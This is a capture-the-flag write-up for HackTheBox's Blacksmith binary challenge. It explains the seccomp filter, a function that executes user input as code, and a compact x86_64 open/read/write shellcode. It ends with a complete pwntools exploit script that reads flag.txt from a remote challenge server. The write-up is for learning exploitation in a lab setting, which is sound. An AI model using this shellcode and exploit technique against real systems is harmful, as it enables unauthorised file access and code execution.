Blacksmith (HackTheBox)

Hey all. Today we're going to discuss the retired Blacksmith challenge on HackTheBox. The description on HackTheBox is as follows:

You are the only one who is capable of saving this town and bringing peace upon this land! You found a blacksmith who can create the most powerful weapon in the world! You can find him under the label "./flag.txt".

In this write-up, we will learn about seccomp, writing assembly, and performing syscalls.

Summary

  • First looks
  • Finding vulnerability primitives
  • Developing AMD64 (x86_64) assembly
  • Retrieving the flag

First looks

We are given the blacksmith executable binary. Upon running the binary, we are presented with a menu to trade items:

$ ./blacksmith
Traveler, I need some materials to fuse in order to create something really powerful!
Do you have the materials I need to craft the Ultimate Weapon?
1. Yes, everything is here!
2. No, I did not manage to bring them all!
> 1
What do you want me to craft?
1. sword
2. shield
3. bow
> 3
This bow's range is the best!
Too bad you do not have enough materials to craft some arrows too..
The program output

I usually start by checking the binary's protections with pwntools' checksec. For the blacksmith binary, the result is:

$ checksec blacksmith
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
The checksec output

The fields in checksec mean the following:

  • Arch: the CPU architecture and instruction set (x86, ARM, MIPS, ...)
  • RELRO: Relocation Read-Only - makes relocation data such as the GOT read-only after dynamic linking
  • Stack: stack canaries - detect stack buffer overflows before a function returns
  • NX: No eXecute - writable memory such as the stack cannot be executed
  • PIE: Position Independent Executable - the binary can be loaded at a randomized base address
  • RWX: Read Write Execute - the binary has segments that are readable, writable and executable at once
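To make the NX and RWX rows a bit more concrete: as far as I know, checksec derives them from the permission flags in the ELF program headers. The sketch below is not how pwntools implements it. It is a minimal illustration that assumes a little-endian ELF64 image, and the helper names gnu_stack_flags and stack_is_executable are hypothetical. It looks up the PT_GNU_STACK header, which describes the stack permissions, and checks its execute bit.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type that describes stack permissions
PF_X = 0x1                 # "executable" bit in p_flags


def gnu_stack_flags(elf: bytes):
    """Return p_flags of PT_GNU_STACK in a little-endian ELF64 image, or None."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    (e_phoff,) = struct.unpack_from("<Q", elf, 0x20)               # program header table offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)    # entry size and count
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            return p_flags
    return None


def stack_is_executable(elf: bytes) -> bool:
    """True only if a PT_GNU_STACK header is present and has the execute bit set."""
    flags = gnu_stack_flags(elf)
    return flags is not None and bool(flags & PF_X)
```

Calling stack_is_executable(open("blacksmith", "rb").read()) should, under these assumptions, agree with the "NX disabled" row above.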

Since NX is disabled and the binary has RWX segments, the logical conclusion is that we need to write shellcode into RWX memory that reads out flag.txt (as hinted by the challenge description).

Finding vulnerability primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork. An example of primitives working together is as follows:

  • an information leak primitive to leak an address
  • an arbitrary write primitive to control the execution flow

... which work together: the write primitive redirects the execution flow to an address obtained through the leak.

Main analysis

When I want to find vulnerability primitives, I open the binary in Ghidra, a reverse engineering tool developed by the NSA (yes, that NSA). I start analyzing a binary at the main function. In this case, it looked like the following:

void main(void)
{
  size_t __n;
  long in_FS_OFFSET;
  int i_has_things;
  int i_option;
  char *local_20;
  char *local_18;
  long __can_token;
  
  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  setup();
  // ...
  __isoc99_scanf("%d",&i_has_things);
  if (i_has_things != 1) {
    puts("Farewell traveler! Come back when you have all the materials!");
    exit(34);
  }
  printf(s_What_do_you_want_me_to_craft?_1._001012e0);
  __isoc99_scanf("%d",&i_option);
  sec();
  if (i_option == 2) {
    shield();
  } else if (i_option == 3) {
    bow();
  } else if (i_option == 1) {
    sword();
  } else {
    write(STDOUT_FILENO,local_18,strlen(local_18));
    exit(261);
  }
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}
Decompilation of the main function

So, the main function does the following:

  1. setup()
  2. sec()
  3. shield(), bow() or sword()

In addition, main uses a stack canary, stored in the variable __can_token. If __can_token no longer equals the original value when the function returns, stack corruption has been detected and __stack_chk_fail is called, which aborts the program.

The setup function disables buffering for stdout and stdin, which is standard and hence not interesting. In contrast, the sec function is interesting.

Sec function

void sec(void)

{
  void* ctx;
  long in_FS_OFFSET;
  long __can_token;
  
  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  // ...
                    // allow sys_read, sys_write, 
                    // sys_open, sys_exit
  ctx = seccomp_init(0);
  seccomp_rule_add(ctx,0x7fff0000,2,0);
  seccomp_rule_add(ctx,0x7fff0000,0,0);
  seccomp_rule_add(ctx,0x7fff0000,1,0);
  seccomp_rule_add(ctx,0x7fff0000,60,0);
  seccomp_load(ctx);
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
    __stack_chk_fail();
  }
  return;
}
The sec function

We can see that the sec function uses seccomp to create an allow list of the syscalls sys_read, sys_write, sys_open, and sys_exit: seccomp_init(0) sets the default action to kill (SCMP_ACT_KILL), and every rule is added with the action 0x7fff0000 (SCMP_ACT_ALLOW). (Note that the naming convention for internal syscall functions is a sys_ prefix. When we say sys_read, we mean the syscall read.) By doing this, the developer of the program prevents us from spawning a shell on the server, since we would need sys_execve("/bin/sh", NULL, NULL) for that. Because sys_execve is not on the allow list, we cannot use it. Remember this for later.
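The allow list can be modelled in a few lines of Python. This is only a simplified sketch of the filter's decision logic, not libseccomp itself. The names RULES, action_for and allowed_names are made up for illustration, and the syscall numbers are the x86_64 ones.

```python
SCMP_ACT_KILL = 0x00000000   # default action passed to seccomp_init(0)
SCMP_ACT_ALLOW = 0x7FFF0000  # action used in every seccomp_rule_add call

# x86_64 syscall numbers that appear in sec(), plus execve for comparison
SYSCALL_NAMES = {0: "read", 1: "write", 2: "open", 59: "execve", 60: "exit"}

# (action, syscall number) pairs in the order sec() adds them
RULES = [
    (SCMP_ACT_ALLOW, 2),
    (SCMP_ACT_ALLOW, 0),
    (SCMP_ACT_ALLOW, 1),
    (SCMP_ACT_ALLOW, 60),
]


def action_for(nr: int, default: int = SCMP_ACT_KILL) -> int:
    """Return the action this simplified filter takes for syscall number nr."""
    for action, rule_nr in RULES:
        if rule_nr == nr:
            return action
    return default


def allowed_names():
    """Names of all syscalls that have an explicit allow rule."""
    return sorted(SYSCALL_NAMES[nr] for action, nr in RULES if action == SCMP_ACT_ALLOW)
```

Here action_for(59) falls through to the default kill action, which is why an execve-based shellcode is not an option.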

Shield analysis

Furthermore, we have the shield(), bow() and sword() calls in main(). The bow() and sword() functions crash the program before a user can give input, which makes them irrelevant. So the vulnerability must be in shield().

void shield(void)

{
  size_t strlen;
  long in_FS_OFFSET;
  char buf[72];
  long __can_token;
  
  __can_token = *(long *)(in_FS_OFFSET + 0x28);
  strlen = ::strlen(s_Excellent_choice!_This_luminous_s_00101080);
  write(1,s_Excellent_choice!_This_luminous_s_00101080,strlen);
  strlen = ::strlen("Do you like your new weapon?\n> ");
  write(1,"Do you like your new weapon?\n> ",strlen);
  read(0,buf,63);
  (*(code *)buf)();
  if (__can_token != *(long *)(in_FS_OFFSET + 0x28)) {
                    // WARNING: Subroutine does not return
    __stack_chk_fail();
  }
  return;
}
The shield function

What sticks out to me in this function is that it reads user input into buf and then calls buf like a function using (*(code *)buf)();. That call is equivalent to the ASM below:

00100dd9 48 8d 55     LEA       RDX, [RBP - 0x50]   ; code* RDX = &buf
         b0
00100ddd b8 00 00     MOV       EAX, 0x0
         00 00
00100de2 ff d2        CALL      RDX                 ; RDX()
ASM version of (*(code *)buf)();

The (*(code *)buf)(); call executes the contents of the buf variable on the stack as machine code. This means we can inject our own assembly into the program.

Developing AMD64 (x86_64) assembly

We have an arbitrary code execution primitive, so we need to write an assembly payload. The difficulties are:

  • We have 63 bytes to work with:
  // shield() function
  read(STDIN_FILENO,buf,63);
  (*(code *)buf)();
Part of the shield() function
  • We can only use sys_read, sys_write, sys_open and sys_exit:
  // sec() function
  // allow sys_read, sys_write, 
  // sys_open, sys_exit
  ctx = seccomp_init(0);
  seccomp_rule_add(ctx,0x7fff0000,2,0);
  seccomp_rule_add(ctx,0x7fff0000,0,0);
  seccomp_rule_add(ctx,0x7fff0000,1,0);
  seccomp_rule_add(ctx,0x7fff0000,60,0);
  seccomp_load(ctx);
Part of the sec() function
  • We do not know any stack address (ASLR), so the payload has to locate its data relative to rip

However, the challenge description told us that we need to read the flag.txt file. Hence, the strategy for this payload is opening flag.txt, reading flag.txt into a buffer, and writing the buffer to stdout.

To interact with those files, we need to use system calls ("syscalls"). Syscalls are essentially the ABI (binary API) of the Linux kernel, which is like the god of the operating system: it provides memory management, CPU scheduling, driver management, hardware IO, et cetera. If you want to learn more about the kernel, the book "Linux Kernel Development" by Robert Love is an excellent resource (I've read it).
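On Linux x86_64, a syscall is made by putting the syscall number in rax, the arguments in rdi, rsi, rdx, r10, r8 and r9 (in that order), and executing the syscall instruction. The return value comes back in rax, and the instruction itself overwrites rcx and r11. The small sketch below only illustrates that mapping. The helper name syscall_regs is hypothetical, and the "&filename" string is a placeholder for a pointer.

```python
ARG_REGS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")  # argument order for syscalls
CLOBBERED = ("rcx", "r11")  # overwritten by the syscall instruction itself


def syscall_regs(nr: int, *args):
    """Map a syscall number and its arguments to the registers that carry them."""
    if len(args) > len(ARG_REGS):
        raise ValueError("a syscall takes at most six arguments")
    regs = {"rax": nr}
    regs.update(zip(ARG_REGS, args))
    return regs


# sys_open(filename, flags, mode) has syscall number 2
print(syscall_regs(2, "&filename", 0, 0))
```

For sys_open this yields rax = 2, rdi = pointer to the filename, rsi = 0 and rdx = 0, which is the register setup a payload has to reproduce in assembly.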

I used a Linux x64 syscall table as a reference for using the syscalls. Essentially the code should do the following:

// sys_open(char* filename, int flags, int mode)
int fd = sys_open("flag.txt", 0, 0);  // flags 0 = O_RDONLY

// sys_read(int fd, char* buf, size_t count)
int nread = sys_read(fd, buf, 0x9999);  // returns the number of bytes read

// sys_write(int fd, char* buf, size_t count)
sys_write(1, buf, nread);  // fd 1 = stdout
C pseudocode of the ASM payload
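The same open, read, write sequence can be tried out locally in Python before writing any assembly. This is only a sketch of the logic: Python's os functions are wrappers, so the syscalls actually issued may differ (for example openat instead of open), and the function name leak_file is made up for illustration.

```python
import os


def leak_file(path: str, out_fd: int = 1, count: int = 0x9999) -> int:
    """Open path read-only, read up to count bytes, and write them to out_fd."""
    fd = os.open(path, os.O_RDONLY)   # mirrors sys_open(path, 0, 0)
    try:
        data = os.read(fd, count)     # mirrors sys_read(fd, buf, count)
    finally:
        os.close(fd)                  # the payload skips this: close is not on the allow list
    return os.write(out_fd, data)     # mirrors sys_write(out_fd, buf, len(data))
```

Calling leak_file("flag.txt") in a directory that contains a test flag prints its contents to stdout and returns the number of bytes written.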

I came up with the following ASM:

mov rax, 2
lea rdi, [rip+41]  ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall

mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, 30
syscall

mov rdx, rax
mov rax, 1
mov rdi, rax
syscall
Payload used to leak flag.txt

Since we have only 63 bytes to work with, I had to be creative. In assembly, many bytes go to constant values: mov rax, 2 assembles to 7 bytes because the constant is stored as a 4-byte immediate (0x00000002) inside the instruction. That means we can save a lot of bytes by reusing register values.
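To put numbers on this, the sketch below compares the sizes of the constant loads with register-to-register instructions from the payload above. The encodings are what I would expect GNU as to emit for Intel syntax. They are an assumption and not taken from the challenge, so confirm them with asm() if exact bytes matter.

```python
# Expected encodings (assumption: GNU as, Intel syntax, 64-bit mode).
CONSTANT_LOADS = {
    "mov rax, 2":  "48 c7 c0 02 00 00 00",
    "mov rdx, 30": "48 c7 c2 1e 00 00 00",
    "mov rax, 1":  "48 c7 c0 01 00 00 00",
}
REGISTER_MOVES = {
    "mov rsi, rdi": "48 89 fe",
    "mov rdi, rax": "48 89 c7",
    "xor rax, rax": "48 31 c0",
}


def size(encoding: str) -> int:
    """Number of bytes in a space-separated hex encoding."""
    return len(bytes.fromhex(encoding))


for name, enc in {**CONSTANT_LOADS, **REGISTER_MOVES}.items():
    print(f"{name:<13} {size(enc)} bytes")
```

Under these assumptions the three constant loads alone take 21 bytes, while each register-only instruction takes 3.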

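I eventually refactored the payload into 46 bytes. Note that this version depends on the register state at the moment buf is called: it expects r10 to hold 1 when the payload starts (pushed for the later sys_write, then incremented to 2 for sys_open), and it uses r11, which the syscall instruction overwrites with the saved RFLAGS, as a nonzero read count: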

push r10
inc r10
mov rax, r10
lea rdi, [rip+31]  ; flag.txt will be at the end of the payload
xor rsi, rsi
xor rdx, rdx
syscall

mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall

mov rdx, rax
pop rax
mov rdi, rax
syscall
The final compressed ASM payload
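The rip-relative offset in the lea has to match the payload length, because the filename is appended directly after the last instruction. The sketch below recomputes it from the instruction sizes. The encodings are my expectation of what GNU as produces, not bytes taken from the original exploit, and the helper name rip_displacement is hypothetical.

```python
# (instruction, expected encoding) pairs for the compressed payload.
# Assumption: encodings as emitted by GNU as for Intel syntax in 64-bit mode.
PAYLOAD = [
    ("push r10",          "41 52"),
    ("inc r10",           "49 ff c2"),
    ("mov rax, r10",      "4c 89 d0"),
    ("lea rdi, [rip+31]", "48 8d 3d 1f 00 00 00"),
    ("xor rsi, rsi",      "48 31 f6"),
    ("xor rdx, rdx",      "48 31 d2"),
    ("syscall",           "0f 05"),
    ("mov rsi, rdi",      "48 89 fe"),
    ("mov rdi, rax",      "48 89 c7"),
    ("xor rax, rax",      "48 31 c0"),
    ("mov rdx, r11",      "4c 89 da"),
    ("syscall",           "0f 05"),
    ("mov rdx, rax",      "48 89 c2"),
    ("pop rax",           "58"),
    ("mov rdi, rax",      "48 89 c7"),
    ("syscall",           "0f 05"),
]


def rip_displacement(instructions, index):
    """Displacement that makes the instruction at index address the first byte after the code."""
    sizes = [len(bytes.fromhex(enc)) for _, enc in instructions]
    end_of_insn = sum(sizes[: index + 1])  # rip already points past the current instruction
    return sum(sizes) - end_of_insn


total = sum(len(bytes.fromhex(enc)) for _, enc in PAYLOAD)
print(total, rip_displacement(PAYLOAD, 3))
```

With these sizes the code is 46 bytes long and the lea ends at offset 15, so the filename sits 31 bytes past rip, matching [rip+31].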

Retrieving the flag

Now that we have a working payload, we need to send it to the application. I made the following script using pwntools:

#!/usr/bin/python3

from pwn import remote, ELF, asm, context

e = ELF('blacksmith')

is_remote = True
if is_remote:
    p = remote("64.227.36.64", 32615)
else:
    p = e.process()

context.binary = e.path  # set the pwntools context for asm()

p.sendlineafter(b"all!\n> ", b'1')
p.sendlineafter(b"\xf0\x9f\x8f\xb9\n> ", b'2')  # get to shield()

payload = asm('''push r10
inc r10
mov rax, r10
lea rdi, [rip+31]
xor rsi, rsi
xor rdx, rdx
syscall

mov rsi, rdi
mov rdi, rax
xor rax, rax
mov rdx, r11
syscall

mov rdx, rax
pop rax
mov rdi, rax
syscall''')

print(f"writing ASM with {len(payload)} bytes")

# payload = shellcode + filename; lea rdi, [rip+31] points at the filename
# explicit NUL terminator so the path does not depend on leftover stack bytes
payload += b"flag.txt\x00"
print(f"writing ASM+filename with {len(payload)} bytes")
assert len(payload) <= 63  # shield() reads at most 63 bytes

p.sendafter(b"weapon?\n> ", payload)
# recvall returns once the connection closes or the timeout expires
print(p.recvall(timeout=5))
The final script used for sending the payload to the application